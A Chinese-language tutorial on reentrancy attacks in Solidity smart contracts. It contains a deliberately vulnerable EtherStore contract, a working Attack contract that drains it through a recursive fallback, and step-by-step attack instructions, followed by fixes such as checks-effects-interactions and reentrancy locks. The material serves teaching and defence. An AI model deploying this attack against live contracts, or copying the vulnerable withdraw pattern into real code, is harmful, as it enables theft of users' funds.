什么是可重入攻击？

       我们使用合约的过程中，经常会遇到这种情况，智能合约能够调用外部的合约；这些外部合约又可以回调到调用他们的智能合约；在这种情况下，我们说智能合约被重新输入，这种情况被称为可重入性。

        正常使用的时候，是没有任何问题；如果攻击者，将攻击代码，插入到合约执行流程中，使得合约执行正常逻辑之外的攻击代码，就会给用户带来损失。

        当用户使用用户账户调用合约B时，属于正常调用，不会有问题；

        如果攻击者创建一个attack合约，去调用B时，就可以发生类似如下的过程；B又回调到attack

合约，然后attack又再次调用到合约B；

 发生这种情况的关键是以下两点：

        1.通过转账调用合约

        gas().call.vale()()：在调用时会发送所有的 gas，当发送失败时会返回布尔值 false，不能有效的防止重入攻击。

        transfer()和send()：只会发送 2300 gas 进行调用，当发送失败时会通过 throw 来进行回滚操作，从而防止了重入攻击。

        2.声明一个可攻击的fallback函数

        回退函数 (fallback function)：回退函数是每个合约中有且仅有一个没有名字的函数，并且该函数无参数，无返回值。

function() public payable(){}

        回退函数在以下几种情况中被执行：

•         调用合约时没有匹配到调用的函数；
•         调用合约时没有传数据；
•         fallback 函数必被标记为 payable时，智能合约收到以太币；

合约分析

        首先部署一个合约——EtherStore，你可以存取ETH。但是这个合约是容易受到重入攻击。

        这里重点分析withdraw函数，首先判断发送者的balance是否大于0，如果大于0，则将balance发送给sender，注意到这里它用来发送ether的函数是call.value,发送完成后，才在下面更新了sender的balances，这里就是可重入攻击的关键所在了；

        当发送者是一个合约时，因为该函数发送ether后，会调用发送者的fallback函数，如果我们在fallback中再继续调用EtherStore的withdraw，则程序会进入循环，不断给我们发送ether，不会执行balances[msg.sender] = 0;无法更新余额，直到EtherStore的余额为0。

contract EtherStore {
    mapping(address => uint) public balances;

    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() public {
        uint bal = balances[msg.sender];
        require(bal > 0);

        (bool sent, ) = msg.sender.call{value: bal}("");
        require(sent, "Failed to send Ether");

        balances[msg.sender] = 0;
    }

    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}

攻击合约如下，我们在攻击合约里的fallback函数里，继续调用EtherStore的withdraw；然后调用attack发动攻击；

contract Attack {
    EtherStore public etherStore;

    constructor(address _etherStoreAddress) {
        etherStore = EtherStore(_etherStoreAddress);
    }

    fallback() external payable {
        if (address(etherStore).balance >= 1 ether) {
            etherStore.withdraw();
        }
    }

    function attack() external payable {
        require(msg.value >= 1 ether);
        etherStore.deposit{value: 1 ether}();
        etherStore.withdraw();
    }

    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}

攻击流程

1、部署EtherStore合约

2、账户A调用EtherStore.deposit()，存入3eth；账户B调用EtherStore.deposit()，存入2eth；

3、部署attack合约

4、账户C调用Attack.attck().完成攻击；

预防与修复

使用其他的转账函数：

如果用户的目的只是向目标地址转账，那么一定要使用transfer函数。

checks-effect-interaction

编写合约函数时， 先检查，然后生效，最后才是交互。

    function withdraw() public {
        uint bal = balances[msg.sender];
        require(bal > 0); //checks
        balances[msg.sender] = 0; //effect
        (bool sent, ) = msg.sender.call{value: bal}(""); //interaction
        require(sent, "Failed to send Ether");

        
    }

使用互斥锁 

 添加一个在代码执行过程中锁定合约的状态变量以防止重入攻击。

contract ReEntrancyGuard {
    bool internal locked;

    modifier noReentrant() {
        require(!locked, "No re-entrancy");
        locked = true;
        _;
        locked = false;
    }
}

也可以直接使用OpenZeppelin提供的重入锁。

openzeppelin-contracts/ReentrancyGuard.sol at master · OpenZeppelin/openzeppelin-contracts · GitHub